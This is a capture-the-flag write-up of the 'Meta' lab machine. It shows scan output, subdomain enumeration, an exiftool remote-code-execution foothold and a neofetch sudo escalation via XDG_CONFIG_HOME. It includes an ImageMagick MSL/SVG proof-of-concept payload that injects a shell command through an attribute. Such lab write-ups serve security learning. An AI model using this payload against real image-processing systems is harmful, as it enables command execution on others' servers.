Summary

Meta was a Medium difficulty Linux box created by Nauten. Initial foothold on the box was to find RCE in exiftool and uploading the modified image with payload to get a shell we get a shell as www-data. Running pspy we see an cron running every minute with a script running we upload a modified svg and we get a shell as user. Rooting the box was pretty simple with just modifying the XDF_CONFIG_HOME and running neofetch with sudo and we get a shell as root.

Initial Enumeration

Running nmap we find

# Nmap 7.92 scan initiated Sun Jan 23 08:30:42 2022 as: nmap -sC -sV -oN nmap/meta 10.129.140.72
Nmap scan report for meta.htb (10.129.140.72)
Host is up (0.31s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-title: Did not follow redirect to http://artcorp.htb
|_http-server-header: Apache
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 08:31:03 2022 -- 1 IP address (1 host up) scanned in 20.56 seconds

We also see artcorp.htb

We find

judy
sarah
thomas

gobuster vhost -u http://artcorp.htb -w /opt/tools/SecLists/Discovery/DNS/subdomains-top1million-110000.txt 

===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://artcorp.htb
[+] Method:       GET
[+] Threads:      10
[+] Wordlist:     /opt/tools/SecLists/Discovery/DNS/subdomains-top1million-110000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/01/23 08:37:37 Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev01.artcorp.htb (Status: 200) [Size: 247]

Running go-buster give us a different subdomain.

Opening the subdomain we see the application MetaView

Checking that we

Trying it out it seem to be an image MetaView viewer.

Trying with a php file we see only jpg and png are allowed. Trying multiple way to bypass we are unable to bypass this.

Now focusing on the output we see it is seem to be an exiftool output

Trying some command injection we see we are unable to inject anything.

Lets look for some vurnebility in exiftool and we find blog

Using exploit

we are able to get a shell as www-data

www-data

Running pspy we see a cronjob running as user thomas

which is

insert-script

<image authenticate='ff" `echo $(id)> ./0wned`;"'>
  <read filename="pdf:/etc/passwd"/>
  <get width="base-width" height="base-height" />
  <resize geometry="400x400" />
  <write filename="test.png" />
  <svg width="700" height="700" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">       
  <image xlink:href="msl:poc.svg" height="100" width="100"/>
  </svg>
</image>

We can get the ssh key of thomas and login on the box and grab user.txt

Privilege Escalation

We see XDG_CONFIG_HOME is kept so we can modify that and pass that as env and get root.

Rooted the box